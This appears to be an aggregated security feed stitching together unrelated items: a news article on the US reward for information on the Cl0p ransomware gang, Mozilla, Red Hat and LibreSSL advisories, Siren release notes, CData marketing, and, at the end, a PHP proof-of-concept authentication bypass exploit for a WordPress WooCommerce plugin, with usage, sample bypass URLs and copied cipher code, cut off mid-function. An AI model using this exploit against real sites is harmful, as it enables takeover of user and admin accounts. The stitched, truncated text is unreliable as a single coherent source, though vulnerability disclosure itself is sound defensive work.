Categories: News
Categories: Ransomware
Tags: Cl0p

Tags:  ransomware

Tags:  RFJ

Tags:  10 million

Tags:  MOVEit

Rewards for Justice (RFJ) is offering a reward of up to $10 million for information the Cl0p ransomware gang is acting at the direction or under the control of a foreign government.



(Read more...)




The post US dangles $10 million reward for information about Cl0p ransomware gang appeared first on Malwarebytes Labs.

The US Department of State’s national security rewards program, Rewards for Justice (RFJ), is offering a reward of up to $10 million for information linking the Cl0p ransomware gang, or any other malicious cyber actors targeting US critical infrastructure, to a foreign government.

> — Rewards for Justice (@RFJ\_USA) June 16, 2023

This is not really new. RFJ’s statutory authorities offers rewards for information in four broad categories and one of them is:

**Malicious Cyber Activity** For information that identifies or locates any individual who, while acting at the direction or under the control of a foreign government, aids or abets a violation of the Computer Fraud and Abuse Act  (“CFAA”), 18 U.S.C. § 1030. This includes foreign election interference.

But the Tweet explicitly mentioning Cl0p is new. The gang is thought to be behind a recent ransomware spree that compromised a large number of organizations by exploiting a zero-day flaw in Progress’ MOVEit Transfer software.

With as many as 2,500 targets exposed on the Internet, the number of potential victims could be in the hundreds. Some of them have already confirmed, either by the firms themselves or by  being mentioned on the Cl0p leak site.

Campaigns like Cl0p's abuse of the MOVEit vulnerability, or high profile attacks like the one on Colonial Pipeline in 2021, can trigger an extra focus on the specific ransomware group responsible. Perhaps aware of this, Cl0p took to its website to preemptively promise that it was not going to use data stolen from government organizations and would delete it instead.

It seems that was not enough to avoid getting in the cross-hairs of the US federal government, as we predicted just hours before. The tweet appeared shortly after our own Cybersecurity Evangelist, Mark Stockley, expressed his doubts that Cl0p's plan would help them avoid unwanted attention from law enforcement.

> "Cl0p's approach supposes that the US government would react more strongly to sensitive data being leaked than it would to multiple simultaneous breaches by the same criminal organisation. This ignores the fact that by using zero-days to attack hundreds of targets simultaneously, including parts of the federal government, Cl0p has already made itself ransomware's squeakiest wheel."

And don’t think that all these ransomware operators sit safely out of reach, behind what used to be an iron curtain. The recent arrest of Ruslan Magomedovich Astamirov, a ransomware actor associated with LockBit, in Arizona, shows that the cybercriminals think they can hide anywhere if they are careful enough.

US Attorney Philip R. Sellinger for the District of New Jersey said:

> “Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended. The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice.”

Also, some criminals can’t help themselves and need to show off how rich they are or how clever they think they are. The best example may be Mark Sokolovsky. This Ukrainian national and alleged cybercriminal loved posting selfies with fistfuls of cash. When the Russian invasion of Ukraine caused him to flee the country, his girlfriend posted pictures of the couple’s journey on her Instagram account. Sokolovsky was arrested in the Netherlands and is awaiting extradition to the US, accused of being a key player in the cybercrime operation behind Raccoon Stealer.

So, if you're in the market for a $10 million reward, happy hunting. And for anyone eligible, I’m throwing in a free copy of Malwarebytes Premium. You’ll need it.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

US dangles $10 million reward for information about Cl0p ransomware gang

When choosing a site-isolated process for a document loaded from a data: URL that was the result of a redirect, Firefox would load that document in the same process as the site that issued the redirect. This bypassed the site-isolation protections against Spectre-like attacks on sites that host an "open redirect". Firefox no longer follows HTTP redirects to data: URLs. This vulnerability affects Firefox < 114.

**Mozilla Foundation Security Advisory 2023-20**

Announced

June 6, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 114

**#CVE-2023-34414: Click-jacking certificate exceptions through rendering lag**

Reporter

Irvan Kurniawan

Impact

high

**Description**

The error page for sites with invalid TLS certificates was missing the activation-delay Firefox uses to protect prompts and permission dialogs from attacks that exploit human response time delays. If a malicious page elicited user clicks in precise locations immediately before navigating to a site with a certificate error and made the renderer extremely busy at the same time, it could create a gap between when the error page was loaded and when the display actually refreshed. With the right timing the elicited clicks could land in that gap and activate the button that overrides the certificate error for that site.

**References**

*   Bug 1695986

**#CVE-2023-34415: Site-isolation bypass on sites that allow open redirects to data: urls**

Reporter

Jun Kokatsu

Impact

moderate

**Description**

When choosing a site-isolated process for a document loaded from a data: URL that was the result of a redirect, Firefox would load that document in the same process as the site that issued the redirect. This bypassed the site-isolation protections against Spectre-like attacks on sites that host an "open redirect". Firefox no longer follows HTTP redirects to data: URLs.

**References**

*   Bug 1811999

**#CVE-2023-34416: Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Gabriele Svelto, Andrew McCreight, the Mozilla Fuzzing Team, Sean Feng, and Sebastian Hengst reported memory safety bugs present in Firefox 113 and Firefox ESR 102.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 114 and Firefox ESR 102.12

**#CVE-2023-34417: Memory safety bugs fixed in Firefox 114**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Andrew McCreight, Randell Jesup, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 113. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 114

CVE-2023-34415: Security Vulnerabilities fixed in Firefox 114

Memory safety bugs present in Firefox 113, Firefox ESR 102.11, and Thunderbird 102.12. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 102.12, Firefox < 114, and Thunderbird < 102.12.



**Mozilla Foundation Security Advisory 2023-21**

Announced

June 7, 2023

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 102.12

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2023-34414: Click-jacking certificate exceptions through rendering lag**

Reporter

Irvan Kurniawan

Impact

high

**Description**

The error page for sites with invalid TLS certificates was missing the activation-delay Thunderbird uses to protect prompts and permission dialogs from attacks that exploit human response time delays. If a malicious page elicited user clicks in precise locations immediately before navigating to a site with a certificate error and made the renderer extremely busy at the same time, it could create a gap between when the error page was loaded and when the display actually refreshed. With the right timing the elicited clicks could land in that gap and activate the button that overrides the certificate error for that site.

**References**

*   Bug 1695986

**#CVE-2023-34416: Memory safety bugs fixed in Thunderbird 102.12**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Gabriele Svelto, Andrew McCreight, the Mozilla Fuzzing Team, Sean Feng, and Sebastian Hengst reported memory safety bugs present in Thunderbird 102.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 102.12

CVE-2023-34416: Security Vulnerabilities fixed in Thunderbird 102.12

In Siren Investigate before 13.2.2, session keys remain active even after logging out.

**Breaking change**

*   The deprecated route ${API_ROOT}/v1/acl/object-permissions/objects is now removed.
    
*   Siren Federate was bumped in the bundles to version 7.17.9-30.1. This version and later versions will no longer work with Java versions earlier than 17. If you have this Federate version, then you can either use the bundled JDK or download JDK for Java 17 and set a new environment variable called ES\_JAVA\_HOME.
    
*   This version will migrate all saved graph objects to a uuid based \_id. If you have used the saved script \_id property in your scripts, which was non-uuid based, you must adjust to the new migrated values. The new values will be logged during upgrade procedure.
    

**Bug fixes**

*   Fixed an issue where local filters on a visualization were getting applied to other visualizations in dashboard 360.
    
*   Fixed an issue with the entity table name header where it appeared differently to other headers.
    
*   Fixed a bug where cancelling the creation of a duplicate entity table caused the buttons to spin endlessly.
    
*   Fixed an issue with a dropdown where it was impossible to select the cluster name when trying to create remote Elasticsearch cluster.
    
*   Fixed a bug with the pie chart vizualisation where the tooltips were getting truncated when field names were very long.
    
*   Fixed an issue where the icon pack zip files were not getting uploaded when client side compression was enabled.
    
*   Fixed an issue where an error was thrown when cancelling and recreating an entity table.
    
*   Fixed a bug where restoring a backup of Elasticsearch on 12.x would throw an error when starting Siren Investigate.
    
*   Fixed a bug where the entity selector in the analytic table visualization wouldn’t show up when selecting the ip field.
    
*   Fixed an issue where the field format of parent searches were not inherited by the child searches.
    
*   Fixed an issue where the Siren API dashboard.getDashboardDataModelRootSearch threw an error when called from a dashboard with no associated search.
    
*   Fixed an issue where the sentinl alarms and reports were not getting deleted.
    

**Graph browser bug fixes**

*   Fixed an issue where entity tables without a configured time field could not be filtered with the timebar even if a time lens was setting a temporal field.
    
*   Fixed an issue where dragging a node would not respect the pointer position.
    
*   Fixed an issue where a nested group could cause the parent group size to increase too much.
    
*   Fixed an issue where multiple CTRL/CMD + click on a node was not toggling the selection.
    
*   Fixed a performance issue where the graph browser would take several seconds to load up with a large number of relations.
    
*   Fixed an issue where the select all checkbox was not triggering the automatic counts for simple relations.
    
*   Fixed an issue where the highlight of nodes could break when interacting with the graph during an expansion operation.
    
*   Fixed an issue where long labels on edges were not truncated.
    
*   Fixed a bug where saved graphs were not being cloned when cloning a dataspace.
    
*   Fixed an issue where removing a node during an animation could crash the application.
    
*   Fixed an issue where clicking a bar on a histogram card would not select the correct nodes.
    
*   Fixed a bug where the graph would not fit correctly when the nodes were expanded.
    
*   Fixed an issue where empty groups were not removed from the graph.
    

**Improvements**

*   The new flex layout is released in this version. For more information, please see the Flex layout dashboards section of the documentation.
    
*   The ES client of Siren API can now perform write actions to Elasticsearch.
    
*   Undo and redo operations can now be done on layouts and expansions.

CVE-2023-35857: Release Notes :: SIREN DOCS

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 9 and June 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 9 to June 16

A double free or use after free could occur after SSL_clear in OpenBSD 7.2 before errata 026 and 7.3 before errata 004, and in LibreSSL before 3.6.3 and 3.7.x before 3.7.3. NOTE: OpenSSL is not affected.

We have released LibreSSL 3.6.3, which will be arriving in the LibreSSL directory of your local OpenBSD mirror soon. It includes the following fixes: \* Bug fix - Hostflags in the verify parameters would not propagate from an SSL\_CTX to newly created SSL. \* Reliability fix - A double free or use after free could occur after SSL\_clear(3). The LibreSSL project continues improvement of the codebase to reflect modern, safe programming practices. We welcome feedback and improvements from the broader community. Thanks to all of the contributors who helped make this release possible.

CVE-2023-35784

CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).

**Comprehensive B2B Integration Made Simple**

Integrate EDI, MFT, and API workflows with your application infrastructure in the cloud or on-premises — no code required.

Try It Now    Watch the Video

**Automate Your B2B Workflows with External Trading Partners and Internal Applications**  

**No-Code Integrations**

Simplify end-to-end integration using a library of prebuilt industry workflows to rapidly connect external trading partners with all your files, apps, and processes.

B2B Integration

**Certified Managed File Transfer**

Drummond Certified for AS2 messaging & file transfer, supporting major MFT standards like AS2, AS4, OFTP, SFTP, and more.

Managed File Transfer

**API and Application Integration**

Seamlessly connect with external partner APIs, internal applications, and services without custom coding and endless maintenance.

API Integration

**EDI Integration**

No matter your industry-specific EDI requirements, CData Arc supports every major EDI standard and protocol, including X12, HL7, FHIR, and EDIFACT.

Electronic Data Interchange

**Best-in-Class Connectivity**

CData boasts the industry's largest catalog of connectivity solutions, giving you access to 85+ applications and 250+ data sources.

Application & Data Connectors

**No-Code B2B Integration**

Our visual, drag-and-drop interface enables integration without specialized B2B developer skills.

**Connect Everything**

CData Arc is certified for all industry protocols and transports, in addition to 85+ connectors to internal, external, and SaaS systems.

**End-to-End Integration**

Wherever you work, get started instantly in the cloud, via marketplaces like AWS and Azure, or via download.

**10,000 Companies Worldwide Rely on CData Connectivity**

"Exceptional. They have repeatedly surprised me."

"Hated EDI…then I found Arc."

"The breadth of features is amazing"

**Organizations Across Every Industry Benefit from Seamless B2B Integration**

Automating key B2B processes can simplify trading amongst customers, suppliers, and business partners, giving your business a competitive edge in the market.

**E-Commerce**

CData Arc gives you the tools to quickly onboard partners, automate order processing, and manage all your EDI partner integrations in one place — while slashing EDI costs up to 90%.

Learn More

**Healthcare**

Meet stringent interoperability and compliance requirements as you securely and automatically share files, documents, and data across healthcare providers, suppliers, insurers, and more.

Learn More

**Retailers**

Simple, transparent, and affordable way to understand inventory levels, fulfill and ship orders on time, and onboard and manage your supplier and trading partner ecosystem.

Learn More

**Suppliers**

CData Arc helps you connect with any retailer over certified AS2, centrally manage all your EDI connections, and fully automate EDI document generation to comply with any retailer specs.

Learn More

**More Resources**

**Blogs**

How to Make E-Commerce Part of Your B2B Ecosystem

Read More

**Case Studies**

Horizon Blue Cross Blue Shield Meets FHIR Interoperability Standards with CData Arc

Read More

Real-Time Data Integration Helps Orange County Streamline Communication with Constituents

Read More

Tangentia Migrates to CData Arc for Simplified EDI Mapping

Read More

**Videos**

CData Arc Cloud: Next Generation B2B Integration

Register Now

On-Demand Webinar: Solutions for Salesforce Integrations

Watch Now

On-Demand Webinar: Build E-Commerce Workflows in Minutes

Watch Now

CVE-2023-24243: CData Arc- Secure Data Integration & Managed File Transfer (MFT)

Red Hat Security Advisory 2023-3642-01 - Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services. This new container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux 9. Issues addressed include bypass, cross site scripting, denial of service, information leakage, spoofing, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Ceph Storage 6.1 Container security and bug fix update  
Advisory ID:       RHSA-2023:3642-01  
Product:           Red Hat Ceph Storage  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3642  
Issue date:        2023-06-15  
CVE Names:         CVE-2021-42581 CVE-2022-1650 CVE-2022-1705  
                   CVE-2022-2880 CVE-2022-21680 CVE-2022-21681  
                   CVE-2022-24675 CVE-2022-24785 CVE-2022-26148  
                   CVE-2022-27664 CVE-2022-28131 CVE-2022-28327  
                   CVE-2022-29526 CVE-2022-30629 CVE-2022-30630  
                   CVE-2022-30631 CVE-2022-30632 CVE-2022-30633  
                   CVE-2022-30635 CVE-2022-31097 CVE-2022-31107  
                   CVE-2022-31123 CVE-2022-31130 CVE-2022-32148  
                   CVE-2022-32189 CVE-2022-32190 CVE-2022-35957  
                   CVE-2022-39201 CVE-2022-39229 CVE-2022-39306  
                   CVE-2022-39307 CVE-2022-39324 CVE-2022-41715  
                   CVE-2022-41912  
====================================================================  
1. Summary:

A new container image for Red Hat Ceph Storage 6.1 is now available in the  
Red Hat Ecosystem Catalog.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Ceph Storage is a scalable, open, software-defined storage platform  
that combines the most stable version of the Ceph storage system with a  
Ceph management platform, deployment utilities, and support services.

This new container image is based on Red Hat Ceph Storage 6.1 and Red Hat  
Enterprise Linux 9.

Security Fix(es):

* crewjam/saml: Authentication bypass when processing SAML responses  
containing multiple Assertion elements (CVE-2022-41912)

* eventsource: Exposure of Sensitive Information (CVE-2022-1650)

* grafana: stored XSS vulnerability (CVE-2022-31097)

* grafana: OAuth account takeover (CVE-2022-31107)

* ramda: prototype poisoning (CVE-2021-42581)

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)

* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)

* marked: regular expression block.def may lead Denial of Service  
(CVE-2022-21680)

* marked: regular expression inline.reflinkSearch may lead Denial of  
Service (CVE-2022-21681)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* Moment.js: Path traversal  in moment.locale (CVE-2022-24785)

* grafana: An information leak issue was discovered in Grafana through  
7.3.4, when integrated with Zabbix (CVE-2022-26148)

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: syscall: faccessat checks wrong group (CVE-2022-29526)

* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)

* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)

* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)

* grafana: plugin signature bypass (CVE-2022-31123)

* grafana: data source and plugin proxy endpoints leaking authentication  
tokens to some destination plugins (CVE-2022-31130)

* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)

* golang: net/url: JoinPath does not strip relative path components in all  
circumstances (CVE-2022-32190)

* grafana: Escalation from admin to server admin when auth proxy is used  
(CVE-2022-35957)

* grafana: Data source and plugin proxy endpoints could leak the  
authentication cookie to some destination plugins (CVE-2022-39201)

* grafana: using email as a username can block other users from signing in  
(CVE-2022-39229)

* grafana: email addresses and usernames cannot be trusted (CVE-2022-39306)

* grafana: User enumeration via forget password (CVE-2022-39307)

* grafana: Spoofing of the originalUrl parameter of snapshots  
(CVE-2022-39324)

* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Space precludes documenting all of these changes in this advisory. Users  
are directed to the Red Hat Ceph Storage Release Notes for information on  
the most significant of these changes:

https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index

All users of Red Hat Ceph Storage are advised to pull these new images from  
the Red Hat Ecosystem catalog, which provides numerous enhancements and bug  
fixes.

3. Solution:

For details on how to apply this update, see Upgrade a Red Hat Ceph Storage  
cluster using cephadm in the Red Hat Storage Ceph Upgrade  
Guide.(https://access.redhat.com/documentation/en-us/red_hat_ceph_storage)

4. Bugs fixed (https://bugzilla.redhat.com/):

2066563 - CVE-2022-26148 grafana: An information leak issue was discovered in Grafana through 7.3.4, when integrated with Zabbix  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2082705 - CVE-2022-21680 marked: regular expression block.def may lead Denial of Service  
2082706 - CVE-2022-21681 marked: regular expression inline.reflinkSearch may lead Denial of Service  
2083778 - CVE-2021-42581 ramda: prototype poisoning  
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group  
2085307 - CVE-2022-1650 eventsource: Exposure of Sensitive Information  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2104365 - CVE-2022-31097 grafana: stored XSS vulnerability  
2104367 - CVE-2022-31107 grafana: OAuth account takeover  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2125514 - CVE-2022-35957 grafana: Escalation from admin to server admin when auth proxy is used  
2131146 - CVE-2022-31130 grafana: data source and plugin proxy endpoints leaking authentication tokens to some destination plugins  
2131147 - CVE-2022-31123 grafana: plugin signature bypass  
2131148 - CVE-2022-39201 grafana: Data source and plugin proxy endpoints could leak the authentication cookie to some destination plugins  
2131149 - CVE-2022-39229 grafana: using email as a username can block other users from signing in  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2138014 - CVE-2022-39306 grafana: email addresses and usernames cannot be trusted  
2138015 - CVE-2022-39307 grafana: User enumeration via forget password  
2148252 - CVE-2022-39324 grafana: Spoofing of the originalUrl parameter of snapshots  
2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements  
2168965 - [cee/sd][rook-ceph]cephfs-top utility is not available under rook-ceph-oprator/tools pod  
2174461 - add dbus-daemon binary - required for NFS in ODF 4.13  
2174462 - add ceph-exporter pkg to RHCS 6.1 image  
2186142 - [RHCS 6.1] [Deployment] Cephadm bootstrap failing with default image.

5. References:

https://access.redhat.com/security/cve/CVE-2021-42581  
https://access.redhat.com/security/cve/CVE-2022-1650  
https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-21680  
https://access.redhat.com/security/cve/CVE-2022-21681  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-26148  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29526  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-31097  
https://access.redhat.com/security/cve/CVE-2022-31107  
https://access.redhat.com/security/cve/CVE-2022-31123  
https://access.redhat.com/security/cve/CVE-2022-31130  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/cve/CVE-2022-32190  
https://access.redhat.com/security/cve/CVE-2022-35957  
https://access.redhat.com/security/cve/CVE-2022-39201  
https://access.redhat.com/security/cve/CVE-2022-39229  
https://access.redhat.com/security/cve/CVE-2022-39306  
https://access.redhat.com/security/cve/CVE-2022-39307  
https://access.redhat.com/security/cve/CVE-2022-39324  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41912  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZItdBNzjgjWX9erEAQiyZRAAmhxyXh2kCdMDgFSpVxuovk1ZU2IgC+f9  
pl9fvoynyr8YD0AqysHrvrEt+l5djJ4BPwslreRYB/b46WAy34/80Tm2C9jmAeMV  
BuEYd6iAzjIQB+DgN3CPsuhXs5FIFAfntzJ0/z4RyA9dDwDDGjwsKyc79aCMOStf  
FQZLZ4Muz9i9zUDNDHcwBhDo2CsYxEU80i6ANA65aGqmZ/31XhU7mWU0r/k6vTH6  
gwOpRfKp+UqSLUfmpuQ7jlMpJC5UGyIgenksBs/b+e2CQCgVaBnGj466XlfnUllr  
O6L5yb/xAdSgcrgg07Df8dutunO1lbMRavAgF1P2lQeZ1QVdS0NnB4fUG0C2c0NC  
1cgqb20358d21rJkskb+DXtu8cV2hWrGUBZonAO2dy1wI1BjSqEDAeeMH89E/q3j  
gjg/zvmuoc22++ZmyNjgvLc5iAcBxhNw8TibkIBW3HYHqXAiVJ2hkO7So6QYpRpv  
PbxKcdTGBHw08vvS2zuEEqwYVOe0c5eMxIyQuZoC6KY8ACVXK/75kRj/WPaG4QEs  
KbhJhfmN6uFq2DmRlTGaUbWQSQoXnu7VDVanluvWCklKtc/aNL7/mnsy73l/l/I3  
lZCM8EOH09za1ehL6xpjcTntBQHjba1gnmO8nmg0ZwxEYbvsmF8ruAOHqroQiZbo  
Bj8F2NJYnjY=lgpj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3642-01

WordPress Abandoned Cart Lite for WooCommerce plugin versions 5.14.2 and below proof of concept authentication bypass exploit.

    <?php/*# CVE-2023-2986Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress## Related Details- NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986- Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/- Vulnerable versions : `version <= 5.14.2`- Patched version : `5.15.0`- Github POC Link :`https://github.com/Ayantaker/CVE-2023-2986`## Vulnerability Analysis- A blog link will be added.## Usage```bashsudo apt-get install php-curlphp poc.php http://target_host target_port max_cart_id_to_enumerate``````[*] Enumerating cart ID : 1[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc[*] Enumerating cart ID : 2[*] Enumerating cart ID : 3[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD[*] Enumerating cart ID : 4[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d[*] Enumerating cart ID : 5```> Entering the URL in browser will give you access to the respective users account. If the wordpress admin user himself has an entry, this will give access to the admin console leading to full compromise of the wordpress server.## DisclaimerThis Proof of Concept (POC) has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Author is not responsible or liable for any misuse of the POC. Use responsibly.*/// Uses the encryption functions sourced from the vulnerable plugin// https://github.com/TycheSoftwares/woocommerce-abandoned-cart/tree/v5.14.2/includes/classes/* Copied from https://github.com/TycheSoftwares/woocommerce-abandoned-cart/blob/v5.14.2/includes/classes/class-wcal-aes.php *//* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  *//*  AES implementation in PHP                                                                     *//*    (c) Chris Veness 2005-2014 www.movable-type.co.uk/scripts                                   *//*    Right of free use is granted for all commercial or non-commercial use under CC-BY licence.  *//*    No warranty of any form is offered.                                                         *//* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  *//** * Abandoned Cart Lite for WooCommerce * * It will handle the common action for the plugin. * * @author  Tyche Softwares * @package Abandoned-Cart-Lite-for-WooCommerce/Encrypt-Decrypt-Data *//** * It will genrate the encryption and decryption for data. * * @since 2.8 */class Wcal_Aes {    /**     * AES Cipher function [�5.1]: encrypt 'input' with Rijndael algorithm     *     * @param input message as byte-array (16 bytes)     * @param w     key schedule as 2D byte-array (Nr+1 x Nb bytes) -     *              generated from the cipher key by keyExpansion()     * @return      ciphertext as byte-array (16 bytes)     * @since 2.8     */    public static function cipher( $input, $w ) {        $Nb    = 4; // block size (in words): no of columns in state (fixed at 4 for AES)        $Nr    = count( $w ) / $Nb - 1; // no of rounds: 10/12/14 for 128/192/256-bit keys        $state = array(); // initialise 4xNb byte-array 'state' with input [�3.4]        for ( $i = 0; $i < 4 * $Nb;        $i++ ) {            $state[ $i % 4 ][ floor( $i / 4 ) ] = $input[ $i ];        }        $state = self::addRoundKey( $state, $w, 0, $Nb );        for ( $round = 1; $round < $Nr; $round++ ) { // apply Nr rounds            $state = self::subBytes( $state, $Nb );            $state = self::shiftRows( $state, $Nb );            $state = self::mixColumns( $state, $Nb );            $state = self::addRoundKey( $state, $w, $round, $Nb );        }        $state = self::subBytes( $state, $Nb );        $state = self::shiftRows( $state, $Nb );        $state = self::addRoundKey( $state, $w, $Nr, $Nb );        $output = array( 4 * $Nb ); // convert state to 1-d array before returning [�3.4]        for ( $i = 0; $i < 4 * $Nb;        $i++ ) {            $output[ $i ] = $state[ $i % 4 ][ floor( $i / 4 ) ];        }        return $output;    }    /**     * Xor Round Key into state S [�5.1.4].     *     * @since 2.8     */    private static function addRoundKey( $state, $w, $rnd, $Nb ) {        for ( $r = 0; $r < 4; $r++ ) {            for ( $c = 0; $c < $Nb;            $c++ ) {                $state[ $r ][ $c ] ^= $w[ $rnd * 4 + $c ][ $r ];            }        }        return $state;    }    /**     * Apply SBox to state S [�5.1.1].     *     * @since 2.8     */    private static function subBytes( $s, $Nb ) {        for ( $r = 0; $r < 4; $r++ ) {            for ( $c = 0; $c < $Nb;            $c++ ) {                $s[ $r ][ $c ] = self::$sBox[ $s[ $r ][ $c ] ];            }        }        return $s;    }    /**     * Shift row r of state S left by r bytes [�5.1.2].     *     * @since 2.8     */    private static function shiftRows( $s, $Nb ) {        $t = array( 4 );        